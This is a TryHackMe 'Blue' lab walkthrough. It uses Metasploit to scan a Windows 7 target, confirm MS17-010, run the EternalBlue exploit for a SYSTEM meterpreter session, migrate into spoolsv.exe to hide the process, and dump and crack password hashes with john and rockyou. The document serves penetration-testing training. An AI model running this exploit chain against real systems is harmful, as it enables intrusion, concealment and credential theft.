TryHackMe - Blue
The room link can be found at TryHackMe - Blue
For this room, I will be using the Metasploit framework.
Recon
We begin with a Nmap of the box to see the services and get their version.
msf5 > db_nmap -sC -sV 10.10.47.219
Now we can see all the running services with the services command.
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.47.219 135 tcp msrpc open Microsoft Windows RPC
10.10.47.219 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.47.219 445 tcp microsoft-ds open Windows 7 Professional 7601 Service Pack 1 microsoft-ds workgroup: WORKGROUP
10.10.47.219 3389 tcp ssl/ms-wbt-server open
10.10.47.219 49152 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49153 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49154 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49158 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49160 tcp msrpc open Microsoft Windows RPC
On this machine, we will focus on the SMB service which is on port 445.
We can gather more information using the module auxiliary/scanner/smb/smb_version. Running it the
services page will lock more like this.
10.10.47.219 445 tcp smb open Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)
Also we run auxiliary/scanner/smb/smb1 to check if the box has support for SMBv1.
msf5 auxiliary(scanner/smb/smb1) > run
[+] 10.10.47.219:445 - 10.10.47.219 supports SMBv1 dialect.
[*] 10.10.47.219:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
As the machine name implies the box could be exploitable via EternalBlue. Since the machine has Windows 7 installed and SMBv1 enabled, it is most likely vulnerable. You can read more here Microsoft - EternalBlue.
We can check if the machine is vulnerable by running the module
auxiliary/scanner/smb/smb_ms17_010.
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.47.219:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.47.219:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Gain Access
Now we search for an exploit we can use in Metasploit.
msf5 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Select it using use 2, set LHOST and RHOST, and run it. The exploit could fail multiple times.
But if you continue trying it will succeed. You could also try setting the payload to
generic/shell_reverce_tcp.
Now we have a meterpreter session on the box.
Escalate
If you have a simple shell you can use the post/multi/manage/shell_to_meterpreter module to
upgrade your shell.
If you have a meterpreter shell you can check who you are with:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Since we are NT AUTHORITY\SYSTEM we have full administrator access to the box. With this
privilege, we can migrate our process to spoolsv.exe to hide our process. We can use ps and
migrate command for this. Alternatively, we can use run post/windows/manage/migrate to spawn a
notepad process and migrate to it.
Cracking
To crack the passwords first we need to dump them. There are two ways to do this, we can use the
hashdump command and crack them outside of Metasploit. Else we can run the post module
use post/windows/gather/hashdump this will save the hashes in the database. Then we run
use auxiliary/analyze/crack_windows to crack them with john. The challenge suggests us to use
the wordlist rockyou.txt.
Find flags
To find the flag you can use the search command with the file name from the root directory.
meterpreter > search -f flag*